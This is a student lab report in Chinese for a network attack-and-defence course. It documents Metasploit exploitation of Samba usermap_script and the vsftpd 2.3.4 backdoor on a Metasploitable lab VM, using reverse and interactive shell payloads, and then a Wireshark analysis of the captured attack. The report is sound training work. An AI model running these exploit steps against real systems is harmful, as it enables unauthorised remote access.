20231903 2023-2024-2 《网络攻防实践》实践七报告

1.实践内容

1.1 使用Metasploit进行Linux远程渗透攻击
Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。
任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：
①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；
②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；
③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；
④设置渗透攻击参数（RHOST，LHOST，TARGET等）；
⑤执行渗透攻击；
⑥查看是否正确得到远程Shell，并查看获得的权限。
1.2 实践作业：攻防对抗实践
攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。
防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击
本次实验使用kali和Metasploitable两台虚拟机，它们的IP地址如下：
 

名称	IP
kali	192.168.200.3
Metasploitable	192.168.200.123

（1）kali启动msfconsole，搜索Linux靶机上的Samba服务Usermap_script安全漏洞，并输入命令“use 0”使用该攻击模块：
可使用命令“show payloads"查看该攻击模块的payloads （2）输入命令：set RHOST 192.168.200.123设置被攻击虚拟机IP地址，输入命令：set payload cmd/unix/reverse设置完成攻击载荷便可进行攻击exploit

（3）然后我们分别使用命令ifconfig和whoami来测试本次攻击是否成功，即是否成功获取目标靶机d的主机访问权限，测试结果如下图所示：

可看到我们通过上述攻击成功获取到了目标靶机的主机访问权限，攻击成功。

2.2 实践作业：攻防对抗实践
2.2.1 攻击
本次实验由我和邢庆水同学共同完成，均设置为桥接模式，攻防两方IP地址如下：

名称	IP
kali（攻击方：20231903杜雨芃）	192.168.43.77
Metasploitable（防守方：20231905谭舜聪）	192.168.43.202

在本次实践过程中，攻击方利用vsftp漏洞对防守方的Metasploitable2靶机进行渗透攻击
（1）测试连通性（2）输入命令msfconsole，并查找vsftp漏洞

（3）依次输入以下命令
use exploit/unix/ftp/vsftpd_234_backdoor ：选择渗透攻击模块
show payloads：查看攻击载荷
set payloads payload/cmd/unix/interact：设置攻击的payload
set RHOST 192.168.1.108：设置防守方IP地址
set LHOST 192.168.1.106：设置攻击机IP地址
exploit：开始攻击

从上图可发现渗透成功，获得防守方靶机远程控制权。

2.2.2 防守
攻防两方IP地址如下：

名称	IP
kali（攻击方：20231905谭舜聪）	192.168.43.18
Metasploitable2（防守方：202319103杜雨芃）	192.168.43.1

（1）攻击过程同上述一致，攻击成功后进行操作如下： （2）在此我主要对wireshark抓取的信息进行分析，通过追踪TCP流可发现攻击机进行的相关操作，同时找到攻击机对靶机使用Shellcode。

3.学习中遇到的问题及解决

    问题：实验开始时双方计算机互相无法ping通
    问题解决方案：连接在同一局域网下后即可ping通
 

4.实践总结

通过本次实验，我更好地掌握了对Linux靶机的渗透攻击，进一步熟悉了Metasploit渗透测试软件的使用，提高了动手能力，收获颇丰